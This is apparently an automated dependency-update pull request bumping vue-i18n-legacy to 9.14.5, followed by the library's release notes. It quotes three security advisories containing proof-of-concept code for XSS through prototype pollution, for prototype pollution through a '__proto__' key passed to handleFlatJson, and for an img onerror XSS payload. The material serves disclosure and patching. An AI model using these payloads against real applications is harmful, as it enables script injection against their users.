chore(deps): update dependency vue-i18n-legacy to v9 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
vue-i18n-legacy (source)	8 -> 9.14.5

GitHub Vulnerability Alerts

CVE-2024-52809

Vulnerability type

XSS

Description

vue-i18n can be passed locale messages to createI18n or useI18n.
we can then translate them using t and $t.
vue-i18n has its own syntax for local messages, and uses a message compiler to generate AST.
In order to maximize the performance of the translation function, vue-i18n uses bundler plugins such as @intlify/unplugin-vue-i18n and bulder to convert the AST in advance when building the application.
By using that AST as the locale message, it is no longer necessary to compile, and it is possible to translate using the AST.

The AST generated by the message compiler has special properties for each node in the AST tree to maximize performance. In the PoC example below, it is a static property, but that is just one of the optimizations.
About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts

In general, the locale messages of vue-i18n are optimized during production builds using @intlify/unplugin-vue-i18n,
so there is always a property that is attached during optimization like this time.
But if you are using a locale message AST in development mode or your own, there is a possibility of XSS if a third party injects.

Reproduce (PoC)

<!doctype html>
<html>
  <head>
    <meta charset="utf-8" />
    <title>vue-i18n XSS</title>
    <script src="https://unpkg.com/vue@3"></script>
    <script src="https://unpkg.com/vue-i18n@10"></script>
    <!-- Scripts that perform prototype contamination, such as being distributed from malicious hosting sites or injected through supply chain attacks, etc. -->
    <script>
      /**
       * Prototype pollution vulnerability with `Object.prototype`.
       * The 'static' property is part of the optimized AST generated by the vue-i18n message compiler.
       * About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts
       *
       * In general, the locale messages of vue-i18n are optimized during production builds using `@intlify/unplugin-vue-i18n`,
       * so there is always a property that is attached during optimization like this time.
       * But if you are using a locale message AST in development or your own, there is a possibility of XSS if a third party injects prototype pollution code.
       */
      Object.defineProperty(Object.prototype, 'static', {
        configurable: true,
        get() {
          alert('prototype polluted!')
          return 'prototype pollution'
        }
      })
    </script> 
 </head>
  <body>
    <div id="app">
      <p>{{ t('hello') }}</p>
    </div>
    <script>
      const { createApp } = Vue
      const { createI18n, useI18n } = VueI18n

      // AST style locale message, which build by `@intlify/unplugin-vue-i18n`
      const en = {
        hello: {
          type: 0,
          body: {
            items: [
              {
                type: 3,
                value: 'hello world!'
              }
            ]
          }
        }
      }

      const i18n = createI18n({
        legacy: false,
        locale: 'en',
        messages: {
          en
        }
      })

      const app = createApp({
        setup() {
          const { t } = useI18n()
          return { t }
        }
      })
      app.use(i18n)
      app.mount('#app')
    </script>
  </body>
</html>

Workarounds

Before v10.0.0, we can work around this vulnerability by using the regular compilation (jit: false of @intlify/unplugin-vue-i18n plugin configuration) way instead of jit compilation.

• jit compilation: https://vue-i18n.intlify.dev/guide/advanced/optimization.html#jit-compilation
• bundler plugin option: https://github.com/intlify/bundle-tools/tree/main/packages/unplugin-vue-i18n#jitcompilation

References

• Simillar case: Vue 2 XSS vulnerability with prototype pollution

CVE-2025-27597

Vulnerability type:
Prototype Pollution

Vulnerability Location(s):

# v9.1
node_modules/@​intlify/message-resolver/index.js

# v9.2 or later
node_modules/@​intlify/vue-i18n-core/index.js

Description:

The latest version of @intlify/message-resolver (9.1) and @intlify/vue-i18n-core (9.2 or later), (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) handleFlatJson. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.

Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.

PoC:

// install the package with the latest version
~$ npm install @​intlify/[email protected]
// run the script mentioned below 
~$ node poc.js
//The expected output (if the code still vulnerable) is below. 
// Note that the output may slightly differs from function to another.
Before Attack:  {}
After Attack:  {"pollutedKey":123}

// poc.js
(async () => {
    const lib = await import('@​intlify/message-resolver');
    var someObj = {}
    console.log("Before Attack: ", JSON.stringify({}.__proto__));
    try {
        // for multiple functions, uncomment only one for each execution.
        lib.handleFlatJson ({ "__proto__.pollutedKey": "pollutedValue" })
    } catch (e) { }
    console.log("After Attack: ", JSON.stringify({}.__proto__));
    delete Object.prototype.pollutedKey;
})();

CVE-2025-53892

Summary

The escapeParameterHtml: true option in Vue I18n is designed to protect against HTML/script injection by escaping interpolated parameters. However, this setting fails to prevent execution of certain tag-based payloads, such as <img src=x onerror=...>, if the interpolated value is inserted inside an HTML context using v-html.

This may lead to a DOM-based XSS vulnerability, even when using escapeParameterHtml: true, if a translation string includes minor HTML and is rendered via v-html.

Details

When escapeParameterHtml: true is enabled, it correctly escapes common injection points.

However, it does not sanitize entire attribute contexts, which can be used as XSS vectors via:

<img src=x onerror=alert(1)>

PoC

In your Vue I18n configuration:

const i18n = createI18n({
  escapeParameterHtml: true,
  messages: {
    en: {
      vulnerable: 'Caution: <img src=x onerror="{payload}">'
    }
  }
});

Use this interpolated payload:

const payload = '<script>alert("xss")</script>';
Render the translation using v-html (even not using v-html):

<p v-html="$t('vulnerable', { payload })"></p>
Expected: escaped content should render as text, not execute.

Actual: script executes in some environments (or the payload is partially parsed as HTML).

Impact

This creates a DOM-based Cross-Site Scripting (XSS) vulnerability despite enabling a security option (escapeParameterHtml) .

---

Release Notes

intlify/vue-i18n (vue-i18n-legacy)

v9.14.5

Compare Source

What's Changed

🔒 Security Fixes

• fix: DOM-based XSS via tag attributes for escape parameter by @​kazupon in #​2230

Full Changelog: intlify/vue-i18n@v9.14.4...v9.14.5

v9.14.4

Compare Source

What's Changed

🐛 Bug Fixes

• fix: cannot resolve the ast messages which has json path for v9 by @​kazupon in #​2162

Full Changelog: intlify/vue-i18n@v9.14.3...v9.14.4

v9.14.3

Compare Source

What's Changed

🔒 Security Fixes

• fix: prototype pollution in handleFlatJson, about details see GHSA-p2ph-7g93-hw3m

Full Changelog: intlify/vue-i18n@v9.14.2...v9.14.3

v9.14.2

Compare Source

What's Changed

🔒 Security Fixes

• fix: XSS vulnerability with prototype pollution on AST: GHSA-9r9m-ffp6-9x4v
• fix: prototype pollusion on deepCopy: GHSA-hjwq-mjwj-4x6c

Full Changelog: intlify/vue-i18n@v9.14.1...v9.14.2

v9.14.1

Compare Source

What's Changed

🐛 Bug Fixes

• fix: messages deepCopy mutates src arguments by @​BobbieGoede in #​1975

Full Changelog: intlify/vue-i18n@v9.14.0...v9.14.1

v9.14.0

Compare Source

What's Changed

⚡ Improvement Features

• fix: vue-i18n type definition for vue package by @​BobbieGoede in #​1919

Full Changelog: intlify/vue-i18n@v9.13.1...v9.14.0

v9.13.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

💥 Breaking Changes

• breaking: drop modulo syntax by @​kazupon in intlify/vue-i18n-next#1814

Full Changelog: intlify/vue-i18n@v9.13.1...v10.0.0-alpha.1

v9.13.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

• fix(message-compiler): cannot resolve none-identifier characters at linked key by @​kazupon in intlify/vue-i18n-next#1813

Full Changelog: intlify/vue-i18n@v9.13.0...v9.13.1

v9.12.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

⚠️ Deprecated Features

• fix: EOL announcement warning for vue-i18n-bridge by @​kazupon in intlify/vue-i18n-next#1800

⚡ Improvement Features

• fix: not throw warnings when using implicit fallback by @​ShinnosukeKomiya in intlify/vue-i18n-next#1798

📝️ Documentations

• fix: spelling by @​DamageESP in intlify/vue-i18n-next#1802
• docs: improve documentation by @​kazupon in intlify/vue-i18n-next#1801
• docs: fix dead link on menu by @​kazupon in intlify/vue-i18n-next#1804

New Contributors

• @​ShinnosukeKomiya made their first contribution in intlify/vue-i18n-next#1798
• @​DamageESP made their first contribution in intlify/vue-i18n-next#1802

Full Changelog: intlify/vue-i18n@v9.12.1...v9.13.0

v9.12.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

• fix: compile error for key with included hyphen in named interpolation by @​kazupon in intlify/vue-i18n-next#1797

👕 Refactoring

• refactor: tokenizer by @​kazupon in intlify/vue-i18n-next#1799

Full Changelog: intlify/vue-i18n@v9.12.0...v9.12.1

v9.11.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🌟 Features

• fix: deprecate named interpolation with modulo syntax by @​kazupon in intlify/vue-i18n-next#1795

Full Changelog: intlify/vue-i18n@v9.11.1...v9.12.0

v9.11.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

• fix: regression triple slash including in .d.ts by @​kazupon in intlify/vue-i18n-next#1794

Full Changelog: intlify/vue-i18n@v9.11.0...v9.11.1

v9.10.2

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🌟 Features

• fix: number and date format components not using scope prop by @​BobbieGoede in intlify/vue-i18n-next#1786

New Contributors

• @​xuanzhi33 made their first contribution in intlify/vue-i18n-next#1767
• @​YoshiYo made their first contribution in intlify/vue-i18n-next#1781

Full Changelog: intlify/vue-i18n@v9.10.2...v9.11.0

v9.10.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

• fix: manually add triple slash directive to message-compiler by @​BobbieGoede in intlify/vue-i18n-next#1766

New Contributors

• @​shinGangan made their first contribution in intlify/vue-i18n-next#1763

Full Changelog: intlify/vue-i18n@v9.10.1...v9.10.2

v9.10.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

⚡ Improvement Features

• chore(fix): #​1630 make the install function synchronous to be aligned… by @​k-paxian in intlify/vue-i18n-next#1631

📝️ Documentations

• docs: wrong te docs by @​kazupon in intlify/vue-i18n-next#1753

New Contributors

• @​k-paxian made their first contribution in intlify/vue-i18n-next#1631

Full Changelog: intlify/vue-i18n@v9.10.0...v9.10.1

v9.9.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🌟 Features

• fix: Support for te behavior compatibility before v9.6 by @​kazupon in intlify/vue-i18n-next#1751

📝️ Documentations

• docs: update description of Nuxt I18n and its status by @​BobbieGoede in intlify/vue-i18n-next#1739

New Contributors

• @​twolfvb made their first contribution in intlify/vue-i18n-next#1732
• @​ismailarilik made their first contribution in intlify/vue-i18n-next#1722

Full Changelog: intlify/vue-i18n@v9.9.1...v9.10.0

v9.9.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

• fix: key-value style messages broken after merging (#​1717) by @​chojnicki in intlify/vue-i18n-next#1718

📝️ Documentations

• chore(typo): update injection.md by @​quentinmcq in intlify/vue-i18n-next#1716
• Update syntax.md by @​hinogi in intlify/vue-i18n-next#1701

New Contributors

• @​chojnicki made their first contribution in intlify/vue-i18n-next#1718
• @​quentinmcq made their first contribution in intlify/vue-i18n-next#1716
• @​hinogi made their first contribution in intlify/vue-i18n-next#1701

Full Changelog: intlify/vue-i18n@v9.9.0...v9.9.1

v9.8.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

⚡ Improvement Features

• Register vue jsx types in tsx test by @​yyx990803 in intlify/vue-i18n-next#1661
• chore: improve Vue type definition appending by @​NozomuIkuta in intlify/vue-i18n-next#1671

📈 Performance Fixes

• fix: lower memory usage by @​BobbieGoede in intlify/vue-i18n-next#1677

📝️ Documentations

• Update installation.md by @​KumJungMin in intlify/vue-i18n-next#1676

New Contributors

• @​yyx990803 made their first contribution in intlify/vue-i18n-next#1661
• @​KumJungMin made their first contribution in intlify/vue-i18n-next#1676

Full Changelog: intlify/vue-i18n@v9.8.0...v9.9.0

v9.7.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🌟 Features

• feat: more strictly return type locale detector by @​kazupon in intlify/vue-i18n-next#1640

Full Changelog: intlify/vue-i18n@v9.7.1...v9.8.0

v9.7.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

⚡ Improvement Features

• fix: tweak @intlify/core conditional exports by @​kazupon in intlify/vue-i18n-next#1639

Full Changelog: intlify/vue-i18n@v9.7.0...v9.7.1

v9.6.5

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🌟 Features

• feat: export message merging utilities to shared module by @​BobbieGoede in intlify/vue-i18n-next#1635

Full Changelog: intlify/vue-i18n@v9.6.5...v9.7.0

v9.6.4

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

• fix: Nuxt I18n type inference by @​BobbieGoede in intlify/vue-i18n-next#1628

New Contributors

• @​BobbieGoede made their first contribution in intlify/vue-i18n-next#1628

Full Changelog: intlify/vue-i18n@v9.6.4...v9.6.5

v9.6.3

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

• fix: wrong source getting by @​kazupon in intlify/vue-i18n-next#1624

Full Changelog: intlify/vue-i18n@v9.6.3...v9.6.4

v9.6.2

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

• fix: adjust /* #__PURE__*/ comment timing by @​newives in intlify/vue-i18n-next#1623

New Contributors

• @​newives made their first contribution in intlify/vue-i18n-next#1623

Full Changelog: intlify/vue-i18n@v9.6.2...v9.6.3

v9.6.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

• fix: return null for fucntion by @​kazupon in intlify/vue-i18n-next#1617

Full Changelog: intlify/vue-i18n@v9.6.1...v9.6.2

v9.6.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

• fix: more te logic strictly by @​kazupon in intlify/vue-i18n-next#1612
• fix: te fallback to root by @​kazupon in intlify/vue-i18n-next#1613

Full Changelog: intlify/vue-i18n@v9.6.0...v9.6.1

v9.5.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🌟 Features

• feat!: support resource schema type definition for @intlfy/core-base (@intlify/core) by @​kazupon in intlify/vue-i18n-next#1594

🐛 Bug Fixes

• fix(examples): remove @vite-ignore magic comment by @​kazupon in intlify/vue-i18n-next#1590
• fix: cannot resolve flatjson messages when use setLocaleMessage by @​kazupon in intlify/vue-i18n-next#1601
• fix: strictly key exsisting with te by @​kazupon in intlify/vue-i18n-next#1602

⚡ Improvement Features

• fix: locale detector type definition by @​kazupon in intlify/vue-i18n-next#1591

📝️ Documentations

• docs: add example link by @​kazupon in intlify/vue-i18n-next#1608

Full Changelog: intlify/vue-i18n@v9.5.0...v9.6.0

v9.4.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🌟 Features

• feat(core-base): support locale detector by @​kazupon in intlify/vue-i18n-next#1566

🐛 Bug Fixes

• Handle falsy values in i18n.te() by @​BuuBux in intlify/vue-i18n-next#1554
• fix(core-base): wrong list index resolving on jit optimization by @​kazupon in intlify/vue-i18n-next#1571
• fix: support runtime module for node.js by @​kazupon in intlify/vue-i18n-next#1573

📝️ Documentations

• docs: fix typo in optimization.md by @​Theiaz in intlify/vue-i18n-next#1565
• Fix typos in breaking.md doc by @​piercemorris in intlify/vue-i18n-next#1572

🍭 Examples

• Update nuxt.config.ts in Nuxt 3 Minimal Starter Example by @​ram-you in intlify/vue-i18n-next#1553

New Contributors

• @​BuuBux made their first contribution in intlify/vue-i18n-next#1554
• @​Theiaz made their first contribution in intlify/vue-i18n-next#1565
• @​piercemorris made their first contribution in intlify/vue-i18n-next#1572

Full Changelog: intlify/vue-i18n@v9.4.1...v9.5.0

v9.4.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

• fix: cannot resolve linked refer message by @​kazupon in intlify/vue-i18n-next#1549
• fix: cannot resolve linked refer message that has hypen by @​kazupon in intlify/vue-i18n-next#1550
• fix: type errors for core-base by @​kazupon in intlify/vue-i18n-next#1551

📝️ Documentations

• docs: add build.transpile option by @​kazupon in intlify/vue-i18n-next#1548

Full Changelog: intlify/vue-i18n@v9.4.0...v9.4.1

v9.3.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🌟 Features

• feat(shared): support dist package for browser by @​kazupon in intlify/vue-i18n-next#1527

🐛 Bug Fixes

• fix(vue-i18n-bridge): peer dependency warning by @​kazupon in intlify/vue-i18n-next#1536

⚡ Improvement Features

• feat(core): optimize core package for node.js by @​kazupon in intlify/vue-i18n-next#1530
• fix: optimize tree-shaking for devtools packages by @​kazupon in intlify/vue-i18n-next#1531
• improvement: tweak compler registration and message condition on compile function by @​kazupon in intlify/vue-i18n-next#1532

New Contributors

• @​ram-you made their first contribution in intlify/vue-i18n-next#1525

Full Changelog: intlify/vue-i18n@v9.3.0...v9.4.0

v9.2.2

Compare Source

We are excited to announce the release of Vue I18n v9.3, finally !! This release includes some new features, bug fixes, improvements, and document fixes.

We had commited with 37 contributors. Thanks for your contributing ❤️

In the following, we introduce some of the new features:

🌟 Features

Node.js Dual packages (cjs / mjs)

We provide CommonJS and Native ESM dual module packages for Node.js. This supports both require and import for loading modules in Node.js.

• feat: cjs/mjs file extension fully by @​kazupon in intlify/vue-i18n-next#1147
• feat: support ESM file extension by @​kazupon in intlify/vue-i18n-next#1137
• feat: node esm for message compiler by @​kazupon in intlify/vue-i18n-next#1460

JIT Style Compilation

Supports JIT (Just In Time) style compilation of message formats. This mean, removes the CSP limitation and allows for use in environments such as Service worker, Web worker, and Edge.

It mean also now supports the use-case where locale messages are dynamically retrieved from the backend via the API.

For more information, please see the docs

The performance of JIT-style compilation is close to that of conventional AOT (Ahead Of Time) style compilation, and you can improve the performance to nearly 3x with combination of JIT + AOT.

Below are the compile performance benchmark results for vue-i18n:

> node ./benchmark/index.mjs

compilation:

compile simple message x 396,898 ops/sec ±0.31% (98 runs sampled)
compile complex message x 60,036 ops/sec ±0.34% (99 runs sampled)

simple pattern on 1000 resources (AOT):

resolve time with core x 279,919 ops/sec ±0.19% (99 runs sampled)
resolve time on composition x 93,963 ops/sec ±0.48% (93 runs sampled)
resolve time on composition with compile cache x 230,928 ops/sec ±0.20% (100 runs sampled)

simple pattern on 1000 resources (JIT):

resolve time with core x 277,813 ops/sec ±0.18% (99 runs sampled)
resolve time on composition x 91,959 ops/sec ±0.43% (97 runs sampled)
resolve time on composition with compile cache x 227,117 ops/sec ±0.15% (99 runs sampled)

simple pattern on 1000 resources (JIT + AOT):

resolve time with core x 319,061 ops/sec ±0.18% (100 runs sampled)
resolve time on composition x 204,529 ops/sec ±0.22% (95 runs sampled)
resolve time on composition with compile cache x 204,652 ops/sec ±0.30% (100 runs sampled)

complex pattern on 1000 resources (AOT):

resolve time with core x 240,427 ops/sec ±0.37% (100 runs sampled)
resolve time on composition x 33,959 ops/sec ±0.45% (94 runs sampled)
resolve time on composition with compile cache x 200,980 ops/sec ±0.15% (99 runs sampled)

complex pattern on 1000 resources (JIT):

resolve time with core x 225,739 ops/sec ±0.25% (99 runs sampled)
resolve time on composition x 36,379 ops/sec ±0.49% (97 runs sampled)
resolve time on composition with compile cache x 191,653 ops/sec ±0.24% (100 runs sampled)

complex pattern on 1000 resources (JIT + AOT):

resolve time with core x 278,542 ops/sec ±0.20% (98 runs sampled)
resolve time on composition x 92,781 ops/sec ±0.31% (98 runs sampled)
resolve time on composition with compile cache x 92,865 ops/sec ±0.33% (98 runs sampled)

You can clone Vue I18n and run the benchmark with pnpm build:type && pnpm benchmark to check.

• feat: support JIT like compilation by @​kazupon in intlify/vue-i18n-next#1434
• feat: support AST minification by @​kazupon in intlify/vue-i18n-next#1474

Custome message format

Starting with v9.3, Vue I18n will give message format customization as an experimental feature. This will allow for extending to the message format:

import { createI18n } from 'vue-i18n'
import { messageCompiler } from './compilation'

const i18n = createI18n({
  legacy: false,
  locale: 'en',
  messageCompiler,
  messages: {
    en: {
      hello: 'hello world!',
      greeting: 'hi, {name}!',
      photo: `You have {numPhotos, plural,
        =0 {no photos.}
        =1 {one photo.}
        other {# photos.}
      }`
    }
  }
})

About details, please see the docs

• feat: support custom message format with messageCompiler option by @​kazupon in intlify/vue-i18n-next#1497
• perf: support drop message compiler feature flag by @​kazupon in intlify/vue-i18n-next#1510

Exports type definition and API

Export v-t type definitions and API $te to support Vue I18n extending for third vendors and your Vue applications.

• feat: export v-t directive type by @​kazupon in intlify/vue-i18n-next#1511
• feat: export $te as global on composition mode by @​kazupon in intlify/vue-i18n-next#1222

❗ Important Changes: 1

allowComposition option

The allowComposition option will be removed in Vue I18n v10. We have accordingly output a warning if you are using it.

If you are using Vue I18n Legacy API to migrate to the Composition API, please make sure you have done so with the Vue I18n v9 version.

• fix: prepare to drop allowComposition option by @​kazupon in intlify/vue-i18n-next#1496

Deprecate vue-i18n official bundle plugins

The following plugin or loader for bundler is deprecated because it can be replaced by the unplugin-vue-i18n.

• rollup-plugin-vue-i18n
• vite-plugin-vue-i18n
• vue-i18n-loader

These will only be taken as hot fixes in the future, and no additional functionality will be added.

⚡ Improvement Features: 15

• fix: improve custom extender by @​kazupon in intlify/vue-i18n-next#1494
• Improve documentation about TypeScript Support by @​bchazelle-ubitransport in intlify/vue-i18n-next#1374
• fix: typo in I18nErrorCodes enum by @​T0TProduction in intlify/vue-i18n-next#1394
• Fix typo by @​tkalmar in intlify/vue-i18n-next#1393
• fix: drop node v14 by @​NozomuIkuta in intlify/vue-i18n-next#1399
• fix: avoid transform to globalThis with bundler by @​kazupon in intlify/vue-i18n-next#1413
• fix: global locale is not respected by useI18n by @​Csszabi98 in intlify/vue-i18n-next#1316
• chore: switch to vitest from jest by @​kazupon in intlify/vue-i18n-next#1342
• fix: support pascal case for components by @​kazupon in intlify/vue-i18n-next#1313
• fix: support type inference of Translation, NumberFormat and DatetimeFormat components on SFC template and JSX/TSX by @​kazupon in intlify/vue-i18n-next#1310
• fix: update typescript version and fix type error by @​littleboarx in intlify/vue-i18n-next#1277
• fix: correct typo in TranslateVNodeSymbol by @​DamianGlowala in intlify/vue-i18n-next#1236
• fix: exntending for Composer and VueI18n by @​kazupon in intlify/vue-i18n-next#1237
• fix: change to optionalDependencies by @​kazupon in intlify/vue-i18n-next#1184
• improvement: remove feature flag warning by @​kazupon in intlify/vue-i18n-next#1140

🐛 Bug Fixes: 17

• fix(message-compiler): linked modifier breaks with parenthesis by @​kazupon in intlify/vue-i18n-next#1506
• fix(core-base): isMessageAST more strictly by @​kazupon in intlify/vue-i18n-next#1509
• fix: root context message availability for linked messages in SFCs on production by @​kazupon in intlify/vue-i18n-next#1477
• fix: cleanup global injection resources by @​kazupon in intlify/vue-i18n-next#1479
• fix: conditional exports order for message compiler by @​kazupon in intlify/vue-i18n-next#1461
• fix: allow AST on rt by @​kazupon in intlify/vue-i18n-next#1455
• fix: JIT compilation on runtime only by @​kazupon in intlify/vue-i18n-next#1451
• fix: reslove with caml-case for components by @​kazupon in intlify/vue-i18n-next#1418
• fix: crash of the app when we mix flat json keys by @​kazupon in intlify/vue-i18n-next#1419
• fix: Resolve the message in components which was rendered with slots, for about <i18n-t>, <i18n-n> and <i18n-d> by @​kazupon in intlify/vue-i18n-next#1416
• fix: isPlainObject incorrectly identifies objects wrapped in a Proxy object in Safari 10 by @​reed-soul in intlify/vue-i18n-next#1379
• fix: useI18n wrong type and other type broken by @​kazupon in intlify/vue-i18n-next#1309
• fix: generate ComponentCustomProperties d.ts by @​kazupon in intlify/vue-i18n-next#1306
• fix: avoid VueI18n extending on root by @​kazupon in intlify/vue-i18n-next#1241
• fix: multiple VueI18n extending by @​kazupon in intlify/vue-i18n-next#1239
• fix: tree-shaking Fragment with for vue-i18n-bridge by @​kazupon in intlify/vue-i18n-next#1187
• fix:using the better Fragment detection(#​1122) by @​littleboarx in intlify/vue-i18n-next#1177

📝️ Documentations: 28

• Updates to Nuxt 3 integration guide by @​JPF3N998 in intlify/vue-i18n-next#1520
• docs: add vite-plugin-vue-i18n support vite version to warning notice by @​regchiu in intlify/vue-i18n-next#1499
• feat!: replace algolia with local search by @​g1eny0ung in intlify/vue-i18n-next#1488
• fix(guide): typo resourece -> resource by @​regchiu in intlify/vue-i18n-next#1492
• docs: diff with syntax highlighting in nuxt integration by @​jd-solanki in intlify/vue-i18n-next#1490
• Add example code for deployed app for nuxt3-app-vue-i18n by @​lyqht in intlify/vue-i18n-next#1469
• Fix #​1475: Typo in documentation when referring to translation component by @​ducksblock in intlify/vue-i18n-next#1476
• Update index.md by @​bnss in intlify/vue-i18n-next#1431
• Update breaking.md by @​Sojaner in intlify/vue-i18n-next#1366
• docs: adjust Translation props in JSDoc by @​iamandrewluca in intlify/vue-i18n-next#1372
• docs: update vue-demi version by @​blackwindforce in intlify/vue-i18n-next#1375
• docs: add section about petite-vue-i18n by @​NozomuIkuta in intlify/vue-i18n-next#1402
• docs: Add space before link text by @​munierujp in intlify/vue-i18n-next#1336
• typo fix by @​arikw in intlify/vue-i18n-next#1337
• Fixed Typo by @​flashspys in intlify/vue-i18n-next#1339
• Fixed typo in example by @​tom-knight in intlify/vue-i18n-next#1341
• fix: broken links in v8 docs by @​dekatron

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.